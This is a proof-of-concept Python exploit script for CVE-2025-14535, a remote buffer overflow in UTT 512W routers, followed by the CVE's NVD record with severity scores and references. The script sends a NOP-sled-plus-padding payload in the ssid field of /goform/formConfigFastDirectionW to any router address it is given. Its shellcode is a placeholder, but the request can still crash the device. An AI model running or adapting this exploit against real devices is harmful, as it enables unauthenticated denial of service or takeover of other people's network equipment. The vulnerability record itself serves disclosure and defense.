CVE-2025-14535

#!/usr/bin/env python3 """ CVE-2025-14535 PoC - UTT 进取 512W Buffer Overflow Target: /goform/formConfigFastDirectionW Vulnerability: strcpy buffer overflow via ssid parameter """ import requests import sys TARGET = "http://192.168.1.1" # Router default IP ENDPOINT = "/goform/formConfigFastDirectionW" def create_overflow_payload(length=1000): """Generate overflow payload with NOP sled and shellcode""" # NOP sled for better exploitation reliability nop_sled = b'\x90' * 200 # Minimal shellcode - spawn shell (may need adjustment for target architecture) # This is a placeholder - actual shellcode depends on target CPU architecture (MIPS typically) shellcode = b'\xcc' * 100 # INT3 for debugging padding = b'A' * (length - len(nop_sled) - len(shellcode)) return nop_sled + shellcode + padding def exploit_buffer_overflow(target_ip): """Send malicious request to trigger buffer overflow""" url = f"http://{target_ip}{ENDPOINT}" # Create overflow payload payload = { 'ssid': create_overflow_payload(1000), 'action': 'save' } print(f"[*] Sending exploit payload to {url}") print(f"[*] Payload length: {len(payload['ssid'])} bytes") try: response = requests.post(url, data=payload, timeout=10) print(f"[*] Response status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[+] Exploit sent - device may be crashed or exploited") print(f"[*] Error: {e}") if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] else: target = "192.168.1.1" exploit_buffer_overflow(target)

{"cve": {"id": "CVE-2025-14535", "sourceIdentifier": "[email protected]", "published": "2025-12-11T20:15:54.530", "lastModified": "2026-01-07T20:59:28.983", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in UTT 进取 512W up to 3.1.7.7-171114. Affected is the function strcpy of the file /goform/formConfigFastDirectionW. The manipulation of the argument ssid leads to buffer overflow. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "baseScore": 10.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:utt:512w_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.7-171114", "matchCriteriaId": "962A8F4C-6C57-4682-AF35-16B98ABE7890"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:512w:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "43C0782C-5F34-44B8-9A45-DF3A6121D668"}]}]}], "references": [{"url": "https://github.com/maximdevere/CVE2/issues/7", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.335874", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.335874", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.703621", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}